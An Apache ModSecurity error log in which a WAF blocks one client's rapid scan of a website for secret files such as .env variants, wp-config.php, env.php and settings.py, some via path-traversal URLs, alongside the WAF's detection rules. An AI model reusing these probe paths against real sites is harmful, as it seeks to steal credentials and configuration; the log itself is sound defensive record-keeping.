[Tue May 12 04:51:01.734691 2026] [security2:error] [pid 1820198:tid 1820218] [client 93.123.109.165:16498] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVlc1tk6y7yBJLpJotAQAAAJI"]
[Tue May 12 04:51:01.734802 2026] [security2:error] [pid 1820198:tid 1820218] [client 93.123.109.165:16498] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env"] [unique_id "agKVlc1tk6y7yBJLpJotAQAAAJI"]
[Tue May 12 04:51:02.126643 2026] [security2:error] [pid 1820198:tid 1820218] [client 93.123.109.165:16498] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVlc1tk6y7yBJLpJotAQAAAJI"]
[Tue May 12 04:51:02.129581 2026] [security2:error] [pid 1825179:tid 1825209] [client 93.123.109.165:16488] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVldr1yOh9TvizeziSwgAAAEs"]
[Tue May 12 04:51:02.224807 2026] [core:error] [pid 1825179:tid 1825216] [client 93.123.109.165:16506] AH10244: invalid URI path (/css../../../.env)
[Tue May 12 04:51:02.225725 2026] [security2:error] [pid 1730207:tid 1730228] [client 93.123.109.165:16516] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKVljue9Sp-pIv_Bb639gAAAVM"]
[Tue May 12 04:51:02.225916 2026] [security2:error] [pid 1730207:tid 1730228] [client 93.123.109.165:16516] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/.env"] [unique_id "agKVljue9Sp-pIv_Bb639gAAAVM"]
[Tue May 12 04:51:02.618577 2026] [security2:error] [pid 1730207:tid 1730228] [client 93.123.109.165:16516] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVljue9Sp-pIv_Bb639gAAAVM"]
[Tue May 12 04:51:03.805816 2026] [core:error] [pid 1820198:tid 1820217] [client 93.123.109.165:16536] AH10244: invalid URI path (/css../../../../.env)
[Tue May 12 04:51:03.808180 2026] [security2:error] [pid 1808852:tid 1808860] [client 93.123.109.165:16526] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agKVlxfeipD4uoG21FolZAAAAAU"]
[Tue May 12 04:51:03.808395 2026] [security2:error] [pid 1808852:tid 1808860] [client 93.123.109.165:16526] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/var/www/.env"] [unique_id "agKVlxfeipD4uoG21FolZAAAAAU"]
[Tue May 12 04:51:04.201252 2026] [security2:error] [pid 1808852:tid 1808860] [client 93.123.109.165:16526] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVlxfeipD4uoG21FolZAAAAAU"]
[Tue May 12 04:51:04.311572 2026] [security2:error] [pid 1825287:tid 1825319] [client 93.123.109.165:16542] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /var/www/html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agKVmAgpmE1yW0glLdghuAAAAM4"]
[Tue May 12 04:51:04.311712 2026] [security2:error] [pid 1825287:tid 1825319] [client 93.123.109.165:16542] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/var/www/html/.env"] [unique_id "agKVmAgpmE1yW0glLdghuAAAAM4"]
[Tue May 12 04:51:04.323044 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:16556] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVmHo6NvB9WXx5V-6hzgAAAQg"]
[Tue May 12 04:51:04.323130 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:16556] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVmHo6NvB9WXx5V-6hzgAAAQg"]
[Tue May 12 04:51:04.323273 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:16556] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.local"] [unique_id "agKVmHo6NvB9WXx5V-6hzgAAAQg"]
[Tue May 12 04:51:04.708195 2026] [security2:error] [pid 1730175:tid 1730185] [client 93.123.109.165:16556] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmHo6NvB9WXx5V-6hzgAAAQg"]
[Tue May 12 04:51:04.710791 2026] [security2:error] [pid 1825287:tid 1825319] [client 93.123.109.165:16542] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmAgpmE1yW0glLdghuAAAAM4"]
[Tue May 12 04:51:04.787670 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:16570] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/public/.env"] [unique_id "agKVmNr1yOh9TvizeziSxwAAAEk"]
[Tue May 12 04:51:04.787829 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:16570] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/public/.env"] [unique_id "agKVmNr1yOh9TvizeziSxwAAAEk"]
[Tue May 12 04:51:04.793522 2026] [security2:error] [pid 1820198:tid 1820209] [client 93.123.109.165:16576] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVmM1tk6y7yBJLpJotBgAAAIk"]
[Tue May 12 04:51:04.793592 2026] [security2:error] [pid 1820198:tid 1820209] [client 93.123.109.165:16576] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVmM1tk6y7yBJLpJotBgAAAIk"]
[Tue May 12 04:51:04.793696 2026] [security2:error] [pid 1820198:tid 1820209] [client 93.123.109.165:16576] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/.env.production"] [unique_id "agKVmM1tk6y7yBJLpJotBgAAAIk"]
[Tue May 12 04:51:05.178955 2026] [security2:error] [pid 1825179:tid 1825207] [client 93.123.109.165:16570] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmNr1yOh9TvizeziSxwAAAEk"]
[Tue May 12 04:51:05.183505 2026] [security2:error] [pid 1820198:tid 1820209] [client 93.123.109.165:16576] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=10,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmM1tk6y7yBJLpJotBgAAAIk"]
[Tue May 12 04:51:05.279289 2026] [access_compat:error] [pid 1730175:tid 1730196] [client 93.123.109.165:16602] AH01797: client denied by server configuration: /home/tcttelec/public_html/wp-config.php
[Tue May 12 04:51:05.279628 2026] [security2:error] [pid 1825287:tid 1825311] [client 93.123.109.165:16592] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agKVmQgpmE1yW0glLdghugAAAMY"]
[Tue May 12 04:51:05.279770 2026] [security2:error] [pid 1825287:tid 1825311] [client 93.123.109.165:16592] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/storage/.env"] [unique_id "agKVmQgpmE1yW0glLdghugAAAMY"]
[Tue May 12 04:51:05.681712 2026] [security2:error] [pid 1825287:tid 1825311] [client 93.123.109.165:16592] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmQgpmE1yW0glLdghugAAAMY"]
[Tue May 12 04:51:05.951628 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:46734] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../app/etc/env.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVmc1tk6y7yBJLpJotCAAAAIg"]
[Tue May 12 04:51:05.951772 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:46734] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/app/etc/env.php"] [unique_id "agKVmc1tk6y7yBJLpJotCAAAAIg"]
[Tue May 12 04:51:05.953156 2026] [security2:error] [pid 1808852:tid 1808868] [client 93.123.109.165:46748] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "tct-telecom.fr"] [uri "/www/.env"] [unique_id "agKVmRfeipD4uoG21FolZwAAAA0"]
[Tue May 12 04:51:05.953295 2026] [security2:error] [pid 1808852:tid 1808868] [client 93.123.109.165:46748] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/www/.env"] [unique_id "agKVmRfeipD4uoG21FolZwAAAA0"]
[Tue May 12 04:51:06.347093 2026] [security2:error] [pid 1820198:tid 1820208] [client 93.123.109.165:46734] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmc1tk6y7yBJLpJotCAAAAIg"]
[Tue May 12 04:51:06.347933 2026] [security2:error] [pid 1808852:tid 1808868] [client 93.123.109.165:46748] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmRfeipD4uoG21FolZwAAAA0"]
[Tue May 12 04:51:06.425619 2026] [security2:error] [pid 1730175:tid 1730180] [client 93.123.109.165:46756] ModSecurity: Warning. Pattern match "(?i)(?:\\\\x5c|(?:%(?:c(?:0%(?:[2aq]f|5c|9v)|1%(?:[19p]c|8s|af))|2(?:5(?:c(?:0%25af|1%259c)|2f|5c)|%46|f)|(?:(?:f(?:8%8)?0%8|e)0%80%a|bg%q)f|%3(?:2(?:%(?:%6|4)6|F)|5%%63)|u(?:221[56]|002f|EFC8|F025)|1u|5c)|0x(?:2f|5c)|\\\\/))(?:%(?:(?:f(?:(?:c%80|8)%8)?0%8 ..." at REQUEST_URI_RAW. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "29"] [id "930100"] [rev "3"] [msg "Path Traversal Attack (/../)"] [data "Matched Data: /../ found within REQUEST_URI_RAW: /css../../settings.py"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "7"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVmno6NvB9WXx5V-6h0gAAAQM"]
[Tue May 12 04:51:06.425757 2026] [security2:error] [pid 1730175:tid 1730180] [client 93.123.109.165:46756] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "tct-telecom.fr"] [uri "/settings.py"] [unique_id "agKVmno6NvB9WXx5V-6h0gAAAQM"]
[Tue May 12 04:51:06.829439 2026] [security2:error] [pid 1730175:tid 1730180] [client 93.123.109.165:46756] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Path Traversal Attack (/../)"] [tag "event-correlation"] [hostname "tct-telecom.fr"] [uri "/index.php"] [unique_id "agKVmno6NvB9WXx5V-6h0gAAAQM"]
